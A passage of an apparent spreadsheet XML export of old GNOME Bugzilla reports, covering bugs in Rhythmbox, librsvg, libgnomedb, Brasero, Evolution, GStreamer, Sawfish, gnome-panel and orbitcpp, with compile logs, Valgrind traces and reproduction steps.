    <t>sometimes tries to import temporary files during tag writing with monitoring enabled</t>
  </si>
  <si>
    <t>Seems like there might be a bad interaction between tag writing and directory monitoring.
Seems like we get a:
(15:57:20) [0x9800c00] [rhythmdb_process_events] rhythmdb.c:1935: processing RHYTHMDB_EVENT_FILE_CREATED_OR_MODIFIED
For the temporary file during the tag writing...
Just happened to notice this while trying to debug why I have regular problems with modifying tags - but not sure it is related...</t>
  </si>
  <si>
    <t>LIBRSVG-166809</t>
  </si>
  <si>
    <t>leak in librsvg</t>
  </si>
  <si>
    <t>Valgrind reports this when running gnome-panel:
==12787== 9109 bytes in 515 blocks are definitely lost in loss record 199 of 221
==12787==    at 0x1B904278: malloc (vg_replace_malloc.c:130)
==12787==    by 0x1C21C9F9: IA__g_malloc (gmem.c:137)
==12787==    by 0x1DB326F0: rsvg_paint_server_solid (rsvg-paint-server.c:102)
==12787==    by 0x1DB48281: rsvg_state_init (rsvg-styles.c:80)
==12787==    by 0x1DB50A1E: rsvg_start_element (rsvg.c:440)
==12787==    by 0x1BEDB976: xmlParseStartTag__internal_alias (parser.c:6903)
==12787==    by 0x1BEE309F: xmlParseChunk__internal_alias (parser.c:9411)
==12787==    by 0x1DB5152B: rsvg_handle_write_impl (rsvg.c:1519)
==12787==    by 0x1DB51AE7: rsvg_handle_write (rsvg.c:1904)
==12787==    by 0x1DAD4BA4: gdk_pixbuf__svg_image_load_increment (io-svg.c:134)
==12787==    by 0x1BDEFD2F: IA__gdk_pixbuf_loader_write (gdk-pixbuf-loader.c:503)
==12787==    by 0x1BBB14A2: icon_info_ensure_scale_and_pixbuf (gtkicontheme.c:2428)
==12787==    by 0x1BBB167D: IA__gtk_icon_info_load_icon (gtkicontheme.c:2594)
==12787==    by 0x1BBB2386: IA__gtk_icon_theme_load_icon (gtkicontheme.c:1328)
==12787==    by 0x1DACEEB9: get_cached_icon (gtkfilesystemgnomevfs.c:976)
==12787==    by 0x1DAD02F7: gtk_file_system_gnome_vfs_render_icon
(gtkfilesystemgnomevfs.c:1450)
==12787==    by 0x1BB9B5CB: IA__gtk_file_system_render_icon (gtkfilesystem.c:697)
==12787==    by 0x1BBF9E6A: gtk_path_bar_update_button_appearance (gtkpathbar.c:947)
==12787==    by 0x1BBFA480: _gtk_path_bar_set_path (gtkpathbar.c:1162)
==12787==    by 0x1BB90233: gtk_file_chooser_default_set_current_folder
(gtkfilechooserdefault.c:4743)
==12787==    by 0x1BB840DC: _gtk_file_chooser_set_current_folder_path
(gtkfilechooser.c:974)
==12787==    by 0x1BB841AA: IA__gtk_file_chooser_set_current_folder
(gtkfilechooser.c:618)
==12787==    by 0x1BB93A33: gtk_file_chooser_widget_constructor
(gtkfilechooserwidget.c:162)
==12787==    by 0x1C1C0589: IA__g_object_newv (gobject.c:942)
==12787==    by 0x1C1C0FBF: IA__g_object_new_valist (gobject.c:985)
==12787==    by 0x1C1C1099: IA__g_object_new (gobject.c:823)
==12787==    by 0x1BB892DB: gtk_file_chooser_dialog_constructor
(gtkfilechooserdialog.c:390)
==12787==    by 0x1C1C0589: IA__g_object_newv (gobject.c:942)
==12787==    by 0x1C1C0EF0: IA__g_object_new_valist (gobject.c:1026)
==12787==    by 0x1C1C1099: IA__g_object_new (gobject.c:823)</t>
  </si>
  <si>
    <t>LIBGNOMEDB-355394</t>
  </si>
  <si>
    <t>libgnomedb-2006-9-11 compile error</t>
  </si>
  <si>
    <t>Please describe the problem:
make[3]: Entering directory `/home/hys545/GNOME/Cvs/libgnomedb/libgnomedb/data-entries/plugins'
if /bin/sh ../../../libtool --tag=CC --mode=compile gcc -DPACKAGE_NAME=\GNOME\ DB\ library\ -DPACKAGE_TARNAME=\libgnomedb\ -DPACKAGE_VERSION=\1.9.104\ -DPACKAGE_STRING=\GNOME\ DB\ library\ 1.9.104\ -DPACKAGE_BUGREPORT=\gnome-db-list@gnome.org\ -DGNOME_DB_EXPLICIT_TRANSLATION_DOMAIN=\libgnomedb-3\ -DSTDC_HEADERS=1 -DHAVE_SYS_TYPES_H=1 -DHAVE_SYS_STAT_H=1 -DHAVE_STDLIB_H=1 -DHAVE_STRING_H=1 -DHAVE_MEMORY_H=1 -DHAVE_STRINGS_H=1 -DHAVE_INTTYPES_H=1 -DHAVE_STDINT_H=1 -DHAVE_UNISTD_H=1 -DHAVE_DLFCN_H=1 -DGETTEXT_PACKAGE=\libgnomedb-3\ -DHAVE_LOCALE_H=1 -DHAVE_LC_MESSAGES=1 -DHAVE_BIND_TEXTDOMAIN_CODESET=1 -DHAVE_GETTEXT=1 -DHAVE_DCGETTEXT=1 -DENABLE_NLS=1  -I. -I. -I../../.. -I./.. -I../../.. -pthread -I/usr/include/gtk-2.0 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/freetype2 -I/usr/include/libpng12 -I/usr/X11R6/include -I/usr/include/libgda-1.9 -I/usr/include/libxml2   -I/usr/include/gtksourceview-1.0 -I/usr/include/gtk-2.0 -I/usr/include/libxml2 -I/usr/include/libgnomeprint-2.2 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/freetype2 -I/usr/include/libpng12 -I/usr/X11R6/include -I/usr/include/libart-2.0   -DHAVE_GTKSOURCEVIEW -I/usr/include/libglade-2.0 -I/usr/include/gtk-2.0 -I/usr/include/libxml2 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/freetype2 -I/usr/include/libpng12 -I/usr/X11R6/include   -DHAVE_LIBGLADE -DORBIT2=1 -pthread -I/usr/include/libgnomeui-2.0 -I/usr/include/libgnome-2.0 -I/usr/include/libgnomecanvas-2.0 -I/usr/include/gtk-2.0 -I/usr/include/libart-2.0 -I/usr/include/gconf/2 -I/usr/include/libbonoboui-2.0 -I/usr/include/gnome-vfs-2.0 -I/usr/lib/gnome-vfs-2.0/include -I/usr/include/gnome-keyring-1 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/orbit-2.0 -I/usr/include/libbonobo-2.0 -I/usr/include/bonobo-activation-2.0 -I/usr/include/pango-1.0 -I/usr/include/freetype2 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/libpng12 -I/usr/X11R6/include -I/usr/include/libxml2   -DBUILD_WITH_GNOME -DLIBGNOMEDB_ICONSDIR=\/usr/share/pixmaps/libgnomedb\ -DLIBGNOMEDB_DATADIR=\/usr/share/gnome-db\ -DLIBGNOMEDB_LOCALEDIR=\/usr/share/locale\ -DLIBGNOMEDB_UIDIR=\/usr/share/gnome-db/ui\ -DDTDINSTALLDIR=\\ -DLIBGNOMEDB_PLUGINSDIR=\/usr/lib/libgnomedb/plugins\ -DPREFIX=\/usr\ -DSYSCONFDIR=\/etc\ -DDATADIR=\/usr/share\ -DLIBDIR=\/usr/lib/libgnomedb/plugins\    -O2 -g -pipe -m32 -march=i386 -mtune=pentium4 -MT gnome-db-entry-pict.lo -MD -MP -MF .deps/gnome-db-entry-pict.Tpo -c -o gnome-db-entry-pict.lo gnome-db-entry-pict.c \
then mv -f .deps/gnome-db-entry-pict.Tpo .deps/gnome-db-entry-pict.Plo else rm -f .deps/gnome-db-entry-pict.Tpo exit 1 fi
 gcc -DPACKAGE_NAME=\GNOME DB library\ -DPACKAGE_TARNAME=\libgnomedb\ -DPACKAGE_VERSION=\1.9.104\ -DPACKAGE_STRING=\GNOME DB library 1.9.104\ -DPACKAGE_BUGREPORT=\gnome-db-list@gnome.org\ -DGNOME_DB_EXPLICIT_TRANSLATION_DOMAIN=\libgnomedb-3\ -DSTDC_HEADERS=1 -DHAVE_SYS_TYPES_H=1 -DHAVE_SYS_STAT_H=1 -DHAVE_STDLIB_H=1 -DHAVE_STRING_H=1 -DHAVE_MEMORY_H=1 -DHAVE_STRINGS_H=1 -DHAVE_INTTYPES_H=1 -DHAVE_STDINT_H=1 -DHAVE_UNISTD_H=1 -DHAVE_DLFCN_H=1 -DGETTEXT_PACKAGE=\libgnomedb-3\ -DHAVE_LOCALE_H=1 -DHAVE_LC_MESSAGES=1 -DHAVE_BIND_TEXTDOMAIN_CODESET=1 -DHAVE_GETTEXT=1 -DHAVE_DCGETTEXT=1 -DENABLE_NLS=1 -I. -I. -I../../.. -I./.. -I../../.. -pthread -I/usr/include/gtk-2.0 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/freetype2 -I/usr/include/libpng12 -I/usr/X11R6/include -I/usr/include/libgda-1.9 -I/usr/include/libxml2 -I/usr/include/gtksourceview-1.0 -I/usr/include/gtk-2.0 -I/usr/include/libxml2 -I/usr/include/libgnomeprint-2.2 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/freetype2 -I/usr/include/libpng12 -I/usr/X11R6/include -I/usr/include/libart-2.0 -DHAVE_GTKSOURCEVIEW -I/usr/include/libglade-2.0 -I/usr/include/gtk-2.0 -I/usr/include/libxml2 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/freetype2 -I/usr/include/libpng12 -I/usr/X11R6/include -DHAVE_LIBGLADE -DORBIT2=1 -pthread -I/usr/include/libgnomeui-2.0 -I/usr/include/libgnome-2.0 -I/usr/include/libgnomecanvas-2.0 -I/usr/include/gtk-2.0 -I/usr/include/libart-2.0 -I/usr/include/gconf/2 -I/usr/include/libbonoboui-2.0 -I/usr/include/gnome-vfs-2.0 -I/usr/lib/gnome-vfs-2.0/include -I/usr/include/gnome-keyring-1 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/orbit-2.0 -I/usr/include/libbonobo-2.0 -I/usr/include/bonobo-activation-2.0 -I/usr/include/pango-1.0 -I/usr/include/freetype2 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/libpng12 -I/usr/X11R6/include -I/usr/include/libxml2 -DBUILD_WITH_GNOME -DLIBGNOMEDB_ICONSDIR=\/usr/share/pixmaps/libgnomedb\ -DLIBGNOMEDB_DATADIR=\/usr/share/gnome-db\ -DLIBGNOMEDB_LOCALEDIR=\/usr/share/locale\ -DLIBGNOMEDB_UIDIR=\/usr/share/gnome-db/ui\ -DDTDINSTALLDIR=\\ -DLIBGNOMEDB_PLUGINSDIR=\/usr/lib/libgnomedb/plugins\ -DPREFIX=\/usr\ -DSYSCONFDIR=\/etc\ -DDATADIR=\/usr/share\ -DLIBDIR=\/usr/lib/libgnomedb/plugins\ -O2 -g -pipe -m32 -march=i386 -mtune=pentium4 -MT gnome-db-entry-pict.lo -MD -MP -MF .deps/gnome-db-entry-pict.Tpo -c gnome-db-entry-pict.c  -fPIC -DPIC -o .libs/gnome-db-entry-pict.o
gnome-db-entry-pict.c:32:21: error: gbase64.h: No such file or directory
gnome-db-entry-pict.c: In function 'file_save_cb':
gnome-db-entry-pict.c:420: warning: pointer targets in passing argument 2 of 'g_file_set_contents' differ in signedness
gnome-db-entry-pict.c: In function 'real_set_value':
gnome-db-entry-pict.c:493: warning: pointer targets in assignment differ in signedness
gnome-db-entry-pict.c:494: warning: pointer targets in passing argument 1 of 'strlen' differ in signedness
gnome-db-entry-pict.c: In function 'real_get_value':
gnome-db-entry-pict.c:664: warning: pointer targets in passing argument 1 of 'g_strndup' differ in signedness
make[3]: *** [gnome-db-entry-pict.lo] Error 1
make[3]: Leaving directory `/home/hys545/GNOME/Cvs/libgnomedb/libgnomedb/data-entries/plugins'
make[2]: *** [all-recursive] Error 1
make[2]: Leavinmake[3]: Entering directory `/home/hys545/GNOME/Cvs/libgnomedb/libgnomedb/data-entries/plugins'
if /bin/sh ../../../libtool --tag=CC --mode=compile gcc -DPACKAGE_NAME=\GNOME\ DB\ library\ -DPACKAGE_TARNAME=\libgnomedb\ -DPACKAGE_VERSION=\1.9.104\ -DPACKAGE_STRING=\GNOME\ DB\ library\ 1.9.104\ -DPACKAGE_BUGREPORT=\gnome-db-list@gnome.org\ -DGNOME_DB_EXPLICIT_TRANSLATION_DOMAIN=\libgnomedb-3\ -DSTDC_HEADERS=1 -DHAVE_SYS_TYPES_H=1 -DHAVE_SYS_STAT_H=1 -DHAVE_STDLIB_H=1 -DHAVE_STRING_H=1 -DHAVE_MEMORY_H=1 -DHAVE_STRINGS_H=1 -DHAVE_INTTYPES_H=1 -DHAVE_STDINT_H=1 -DHAVE_UNISTD_H=1 -DHAVE_DLFCN_H=1 -DGETTEXT_PACKAGE=\libgnomedb-3\ -DHAVE_LOCALE_H=1 -DHAVE_LC_MESSAGES=1 -DHAVE_BIND_TEXTDOMAIN_CODESET=1 -DHAVE_GETTEXT=1 -DHAVE_DCGETTEXT=1 -DENABLE_NLS=1  -I. -I. -I../../.. -I./.. -I../../.. -pthread -I/usr/include/gtk-2.0 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/freetype2 -I/usr/include/libpng12 -I/usr/X11R6/include -I/usr/include/libgda-1.9 -I/usr/include/libxml2   -I/usr/include/gtksourceview-1.0 -I/usr/include/gtk-2.0 -I/usr/include/libxml2 -I/usr/include/libgnomeprint-2.2 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/freetype2 -I/usr/include/libpng12 -I/usr/X11R6/include -I/usr/include/libart-2.0   -DHAVE_GTKSOURCEVIEW -I/usr/include/libglade-2.0 -I/usr/include/gtk-2.0 -I/usr/include/libxml2 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/freetype2 -I/usr/include/libpng12 -I/usr/X11R6/include   -DHAVE_LIBGLADE -DORBIT2=1 -pthread -I/usr/include/libgnomeui-2.0 -I/usr/include/libgnome-2.0 -I/usr/include/libgnomecanvas-2.0 -I/usr/include/gtk-2.0 -I/usr/include/libart-2.0 -I/usr/include/gconf/2 -I/usr/include/libbonoboui-2.0 -I/usr/include/gnome-vfs-2.0 -I/usr/lib/gnome-vfs-2.0/include -I/usr/include/gnome-keyring-1 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/orbit-2.0 -I/usr/include/libbonobo-2.0 -I/usr/include/bonobo-activation-2.0 -I/usr/include/pango-1.0 -I/usr/include/freetype2 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/libpng12 -I/usr/X11R6/include -I/usr/include/libxml2   -DBUILD_WITH_GNOME -DLIBGNOMEDB_ICONSDIR=\/usr/share/pixmaps/libgnomedb\ -DLIBGNOMEDB_DATADIR=\/usr/share/gnome-db\ -DLIBGNOMEDB_LOCALEDIR=\/usr/share/locale\ -DLIBGNOMEDB_UIDIR=\/usr/share/gnome-db/ui\ -DDTDINSTALLDIR=\\ -DLIBGNOMEDB_PLUGINSDIR=\/usr/lib/libgnomedb/plugins\ -DPREFIX=\/usr\ -DSYSCONFDIR=\/etc\ -DDATADIR=\/usr/share\ -DLIBDIR=\/usr/lib/libgnomedb/plugins\    -O2 -g -pipe -m32 -march=i386 -mtune=pentium4 -MT gnome-db-entry-pict.lo -MD -MP -MF .deps/gnome-db-entry-pict.Tpo -c -o gnome-db-entry-pict.lo gnome-db-entry-pict.c \
then mv -f .deps/gnome-db-entry-pict.Tpo .deps/gnome-db-entry-pict.Plo else rm -f .deps/gnome-db-entry-pict.Tpo exit 1 fi
 gcc -DPACKAGE_NAME=\GNOME DB library\ -DPACKAGE_TARNAME=\libgnomedb\ -DPACKAGE_VERSION=\1.9.104\ -DPACKAGE_STRING=\GNOME DB library 1.9.104\ -DPACKAGE_BUGREPORT=\gnome-db-list@gnome.org\ -DGNOME_DB_EXPLICIT_TRANSLATION_DOMAIN=\libgnomedb-3\ -DSTDC_HEADERS=1 -DHAVE_SYS_TYPES_H=1 -DHAVE_SYS_STAT_H=1 -DHAVE_STDLIB_H=1 -DHAVE_STRING_H=1 -DHAVE_MEMORY_H=1 -DHAVE_STRINGS_H=1 -DHAVE_INTTYPES_H=1 -DHAVE_STDINT_H=1 -DHAVE_UNISTD_H=1 -DHAVE_DLFCN_H=1 -DGETTEXT_PACKAGE=\libgnomedb-3\ -DHAVE_LOCALE_H=1 -DHAVE_LC_MESSAGES=1 -DHAVE_BIND_TEXTDOMAIN_CODESET=1 -DHAVE_GETTEXT=1 -DHAVE_DCGETTEXT=1 -DENABLE_NLS=1 -I. -I. -I../../.. -I./.. -I../../.. -pthread -I/usr/include/gtk-2.0 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/freetype2 -I/usr/include/libpng12 -I/usr/X11R6/include -I/usr/include/libgda-1.9 -I/usr/include/libxml2 -I/usr/include/gtksourceview-1.0 -I/usr/include/gtk-2.0 -I/usr/include/libxml2 -I/usr/include/libgnomeprint-2.2 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/freetype2 -I/usr/include/libpng12 -I/usr/X11R6/include -I/usr/include/libart-2.0 -DHAVE_GTKSOURCEVIEW -I/usr/include/libglade-2.0 -I/usr/include/gtk-2.0 -I/usr/include/libxml2 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/freetype2 -I/usr/include/libpng12 -I/usr/X11R6/include -DHAVE_LIBGLADE -DORBIT2=1 -pthread -I/usr/include/libgnomeui-2.0 -I/usr/include/libgnome-2.0 -I/usr/include/libgnomecanvas-2.0 -I/usr/include/gtk-2.0 -I/usr/include/libart-2.0 -I/usr/include/gconf/2 -I/usr/include/libbonoboui-2.0 -I/usr/include/gnome-vfs-2.0 -I/usr/lib/gnome-vfs-2.0/include -I/usr/include/gnome-keyring-1 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/orbit-2.0 -I/usr/include/libbonobo-2.0 -I/usr/include/bonobo-activation-2.0 -I/usr/include/pango-1.0 -I/usr/include/freetype2 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/libpng12 -I/usr/X11R6/include -I/usr/include/libxml2 -DBUILD_WITH_GNOME -DLIBGNOMEDB_ICONSDIR=\/usr/share/pixmaps/libgnomedb\ -DLIBGNOMEDB_DATADIR=\/usr/share/gnome-db\ -DLIBGNOMEDB_LOCALEDIR=\/usr/share/locale\ -DLIBGNOMEDB_UIDIR=\/usr/share/gnome-db/ui\ -DDTDINSTALLDIR=\\ -DLIBGNOMEDB_PLUGINSDIR=\/usr/lib/libgnomedb/plugins\ -DPREFIX=\/usr\ -DSYSCONFDIR=\/etc\ -DDATADIR=\/usr/share\ -DLIBDIR=\/usr/lib/libgnomedb/plugins\ -O2 -g -pipe -m32 -march=i386 -mtune=pentium4 -MT gnome-db-entry-pict.lo -MD -MP -MF .deps/gnome-db-entry-pict.Tpo -c gnome-db-entry-pict.c  -fPIC -DPIC -o .libs/gnome-db-entry-pict.o
gnome-db-entry-pict.c:32:21: error: gbase64.h: No such file or directory
gnome-db-entry-pict.c: In function 'file_save_cb':
gnome-db-entry-pict.c:420: warning: pointer targets in passing argument 2 of 'g_file_set_contents' differ in signedness
gnome-db-entry-pict.c: In function 'real_set_value':
gnome-db-entry-pict.c:493: warning: pointer targets in assignment differ in signedness
gnome-db-entry-pict.c:494: warning: pointer targets in passing argument 1 of 'strlen' differ in signedness
gnome-db-entry-pict.c: In function 'real_get_value':
gnome-db-entry-pict.c:664: warning: pointer targets in passing argument 1 of 'g_strndup' differ in signedness
make[3]: *** [gnome-db-entry-pict.lo] Error 1
make[3]: Leaving directory `/home/hys545/GNOME/Cvs/libgnomedb/libgnomedb/data-entries/plugins'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/home/hys545/GNOME/Cvs/libgnomedb/libgnomedb/data-entries'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/home/hys545/GNOME/Cvs/libgnomedb/libgnomedb'
make: *** [all-recursive] Error 1
[root@localhost libgnomedb]#                       `/home/hys545/GNOME/Cvs/libgnomedb/libgnomedb/data-entries'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/home/hys545/GNOME/Cvs/libgnomedb/libgnomedb'
make: *** [all-recursive] Error 1
[root@localhost libgnomedb]#                       
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>BRASERO-503659</t>
  </si>
  <si>
    <t>Top folders not copied to disk</t>
  </si>
  <si>
    <t>Please describe the problem:
================================================================
This bug-report concerns brasero svn trunk of December 14. 2007
================================================================
When I add a folder to a data disk the folder itsself is not copied to the disc.
The files below the folder are on top of the disc.
When I try to copy two folders containing files with same names
MD5 checksum errors occured and brasero could not burn the disc.
Steps to reproduce:
1. Choose creating data disc 
2. Add two folders containing files with same names in them
3. Try to burn the disc
Actual results:
Brasero reports:
Error while burning:
the image can't be created.
The Log shows some MD5sum errors
Expected results:
Burning disc containing two folders containing the files.
Does this happen every time?
Yes
Other information:
I'll add a logfile to the bug-report</t>
  </si>
  <si>
    <t>rspam</t>
  </si>
  <si>
    <t>GNOME-APPLETS-117344</t>
  </si>
  <si>
    <t>SVG Icons dont work in connect/disconnect dialog</t>
  </si>
  <si>
    <t>Description of Problem:
When using scalable vector graphics icons the
dialog box on modem lights does not have a yes/no
button.
Steps to reproduce the problem:
1. Set a SVG theme as the icon set
2. Click connect button
3. Notice the yes no icons are not there
Actual Results:
No icons on yes/no
Expected Results:
Icons for yes/no
How often does this happen? 
Everytime
Additional Information:
I was using this icon theme:
http://art.gnome.org/themes/icon/349.php</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-465374</t>
  </si>
  <si>
    <t>libdb linkage in libedataserver causes LGPL to be invalid</t>
  </si>
  <si>
    <t>libedataserver contains some utility code which uses Berkeley DB.  libedataserver is LGPL.  Berkeley DB is Sleepycat Licensed (http://www.opensource.org/licenses/sleepycat.php) which says:
Redistributions in any form must be accompanied by information on how to obtain complete source code for the DB software and any accompanying software that uses the DB software.
If I write a closed source application I should be able to link it against libebook (which is LGPL).  However libebook links to libedataserver which links to libdb... which means I need to provide the source to my application.
Clearly this is bad.  I think the best solution is to create a new library libedatabackend or something which contains the bits of libedataserver which are libdb wrappers (and anything else which is only used in the backends).</t>
  </si>
  <si>
    <t>GSTREAMER-163340</t>
  </si>
  <si>
    <t>[PATCH] [ffdec_mjpeg] ffdec_mjpeg doesn't work anymore</t>
  </si>
  <si>
    <t>A simple pipeline like:
gst-launch filesrc location=insect_2.jpg blocksize=9999999 !
image/jpegframerate=1.0 ! ffdec_mjpeg ! ffcolorspace ! ximagesink
doesn't display anythig. I've patched gstffmpegdec.c to make it works again.</t>
  </si>
  <si>
    <t>SAWFISH-48319</t>
  </si>
  <si>
    <t>Moving Maximized windows</t>
  </si>
  <si>
    <t xml:space="preserve">ps. How windows are being moved and animated is box 
When an application is maximized and I try to move the 
application (which is impossible then afaik). Then the 
box-lines dont go away.. only when I paint over them 
with another screen :)
-- 
Philip van Hoof aka freax (http://www.freax.eu.org)
irc: irc.openprojects.net mailto:freax @ pandora.be
------- Additional Comments From jsh@pixelslut.com 2001-06-05 18:32:08 ----
I fixed this yesterday
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:18 -------
</t>
  </si>
  <si>
    <t>freax</t>
  </si>
  <si>
    <t>GGV-124865</t>
  </si>
  <si>
    <t>unnecessary horizontal line in Edit menu</t>
  </si>
  <si>
    <t>Edit menu has unnecessary horizontal line.
ggv 2.4.0.1
attaching a screenshot illustrating the problem.</t>
  </si>
  <si>
    <t>EVOLUTION-218765</t>
  </si>
  <si>
    <t>evolution mail component crashes when printing</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.1
Synopsis: evolution mail component crashes when printing
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Every time I try to print a mail message from evolution the mail
component crashes.
No printing is done. 
The same is true for print-preview. 
I am running RedHat 7.0 with Ximian-gnome and installed the latest
evolution and 
gnome-print packages from red carpet this morning but the bug remains. 
To reproduce: open a mail message in evolution select print from the
file menu and
press the print button...
Unknown reporter: guym@cogs.susx.ac.uk changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>guym</t>
  </si>
  <si>
    <t>GSTREAMER-333510</t>
  </si>
  <si>
    <t>[PATCH] Fix gst_pad_new_from_template (gst_static_pad_template_get ()) leaks</t>
  </si>
  <si>
    <t>Many elements use something like:
overlay-&gt;video_sinkpad =
     gst_pad_new_from_template (gst_static_pad_template_get
     (
in their _init function. This is wrong since gst_pad_new_from_template creates a copy of its parameter:
static void
gst_pad_set_property (GObject * object guint prop_id
    const GValue * value GParamSpec * pspec)
{
[...]    
   case PAD_PROP_TEMPLATE:
      gst_pad_set_pad_template (GST_PAD_CAST (object)
          (GstPadTemplate *) g_value_dup_gst_object (value))
      break
}
GstPad *
gst_pad_new_from_template (GstPadTemplate * templ const gchar * name)
{
  g_return_val_if_fail (GST_IS_PAD_TEMPLATE (templ) NULL)
  return g_object_new (GST_TYPE_PAD
      name name direction templ-&gt;direction template templ NULL)
}
gst_object_unref needs to be ran on the result of gst_static_pad_template_get to avoid leaking this GstPadTemplate.</t>
  </si>
  <si>
    <t>GNOME-PANEL-348833</t>
  </si>
  <si>
    <t>Errors in .desktop file break bug-buddy support</t>
  </si>
  <si>
    <t>The ./applets/notification_area/GNOME_NotificationAreaApplet.server.in.in file has the following problems:
 - Lacks (valid?) X-GNOME-Bugzilla-Component (make sure to get the case exactly
right)
 - No version information (optional but recommended)
Currently contains: Notification Area Applet. Should be notification area.
Full reason why this is needed:
Starting with Bug-Buddy 2.15.0 all programs wanting to make use of Bug-Buddy must have a .desktop file. Also the .desktop file must contain a few Bug-Buddy headers.
These are:
X-GNOME-Bugzilla-Bugzilla=GNOME &lt;-- Mandatory
X-GNOME-Bugzilla-Product=XXX &lt;--Mandatory
X-GNOME-Bugzilla-Component=YYY &lt;-- Mandatory
X-GNOME-Bugzilla-OtherBinaries=ZZZ &lt;-- Optional only if you
application has several binaries
X-GNOME-Bugzilla-Version=X.Y.Z &lt;-- Optional but highly recommended. This should need expansion from configure script so if you want this you need a
application.desktop.in.in to expand here @VERSION@
(application.desktop.in is used by intltool for translations).
This headers have actually been in use since 2002 except that Bug-Buddy 2.15.0 will now require:
a) A .desktop file containing at least the mandatory information
b) Given product and component MUST exist on bugzilla.gnome.org
Having the X-GNOME-Bugzilla-Version is optional but highly recommended. The server will automatically change versions like 2.15.90 to 2.15.x so this doesn't have to be changed in the .desktop file. I recommend keeping the real version in the desktop file as I might put this in a comment.
Users will only be able to fill in their email address and a 'What were you doing when the application crashed?'. Version information will not be possible to select anymore. This is why having the X-GNOME-Bugzilla-Version is highly recommended.
If you want Bug-Buddy support but do not want your application to show up in the menus use the following .desktop header:
NoDisplay=true</t>
  </si>
  <si>
    <t>GNOPERNICUS-303609</t>
  </si>
  <si>
    <t>Dictionary Modify button doesn't work</t>
  </si>
  <si>
    <t>[using FreeTTS if it matters]
1. Go to Preferences-&gt;Speech Preferences
2. Enable Use Dictionary and choose Dictionary...
3. Select the USA entry and select the Modify button
4. Enter a new pronounciation of USA (e.g. United Beasts of America) and
choose OK
Get the error message Word exists in dictionary!.  But of course it exists as
you are trying to modify it!</t>
  </si>
  <si>
    <t>ORBIT-CPP-101809</t>
  </si>
  <si>
    <t>Can't build orbitcpp with gcc 2.95.3</t>
  </si>
  <si>
    <t>I can't compilte orbitcpp (1.3.0 or cvs)
It fails with this error:
g++ -DHAVE_CONFIG_H -I. -I. -I../.. -I. -I../../include -DORBIT2=1
-D_REENTRANT -I/usr/include/orbit-2.0 -I/usr//include/linc-1.0
-I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -g -O2 -c
orbitcpp_poa.cc -Wp-MD.deps/orbitcpp_poa.TPlo  -fPIC -DPIC -o
.libs/orbitcpp_poa.lo
In file included from orbitcpp_poa.cc:30:
orbitcpp_simple_seq.h: In instantiation of
`_orbitcpp::SimpleUnboundedSeq':
orbitcpp_smartptr.h:452:   instantiated from
`_orbitcpp::Sequence_var
&gt;'
orbitcpp_poa.h:238:   instantiated from here
orbitcpp_simple_seq.h:147: cannot adjust access to `void
_orbitcpp::SequenceBase&lt;unsigned charunsigned
charCORBA_sequence_CORBA_octet&gt;::length(unsigned int)' in `class
_orbitcpp::SimpleUnboundedSeq'
